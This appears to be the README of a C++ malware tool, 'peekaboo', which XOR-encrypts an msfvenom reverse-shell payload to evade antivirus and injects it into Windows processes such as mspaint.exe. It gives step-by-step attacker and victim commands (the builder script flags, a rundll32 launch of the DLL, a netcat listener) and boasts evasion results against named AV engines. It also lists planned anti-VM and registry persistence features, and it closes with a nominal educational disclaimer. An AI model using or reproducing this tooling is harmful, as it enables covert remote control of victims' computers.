
Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Primary LanguageC++


Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Main logic

XOR encryption and decryption for functions call and main payload - msfvenom reverse shell as example.


1. DLL

on attacker machine

check your IP:

ip a

attacker machine IP

run python script with flags:

python3 peekaboo.py -l -p 4444 --build 1

run python script

then on victim machine (windows 10 x64):

run on powershell or cmd promt:

rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy

run on victim machine

check on attacker machine:

check your netcat listener:

check netcat listener

check IP address


on attacker machine:

check attacker ip:

ip a

check IP

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l -p 4444 -e mspaint.exe --build 2

run python script

then on victim machine run (windows 10 x64):


or click (if -m windows param)

run on victim machine

check on attacker machine:

check your netcat listener:

check netcat listener

3. NT API injector

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l -p 4444 -e mspaint.exe -m console --build 3

enc and compile nt

then on victim machine (windows 10 x64):


run malware

run malware


Tested on:

  1. Attacker machines: Kali linux 2020.1, Windows 10 x64
  2. Victim machine: Windows 7 x64, Windows 10 x64
  3. Payload: windows x64 reverse shell from msfvenom
  4. AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus

virus total result:

02 september 2021



30 december 2021 (NT API injector)

virtustotal 2


antiscan.me result:

11 january 2022 (NT API injector)




  • Compile injector in Kali linux
  • XOR + AES aes branch
  • Calling Windows API functions by hash names
  • Find Kernel32 base via asm style
  • One python builder
  • Anti-VM tricks
  • Persistence via Windows Registry run keys
  • Replace msfvenom shell to donut payload???


This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause
